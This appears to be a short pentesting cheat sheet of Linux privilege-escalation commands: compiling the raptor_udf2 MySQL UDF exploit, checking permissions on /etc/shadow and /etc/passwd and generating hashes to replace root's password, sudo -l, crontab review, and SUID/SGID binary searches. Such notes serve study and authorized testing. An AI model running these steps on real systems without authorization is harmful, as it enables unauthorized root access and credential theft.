Linux Privesc Commands

π Resources π
# https://www.exploit-db.com/exploits/1518
cd /home/user/tools/mysql-udf
gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
ls -l /etc/shadow
# Bruteforce hashes or if world-writable, generate new password and replace root pw
mkpasswd -m sha-512 pwhere
ls -l /etc/passwd
# If world-writable, generate new password and replace root pw
openssl passwd pwhere
sudo -l
# https://gtfobins.github.io/
cat /etc/crontab
# check file/scripts permissions, path environment variable
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
find / -type f -perm -4000 2>/dev/null
# https://www.exploit-db.com/
...
Last updated
Was this helpful?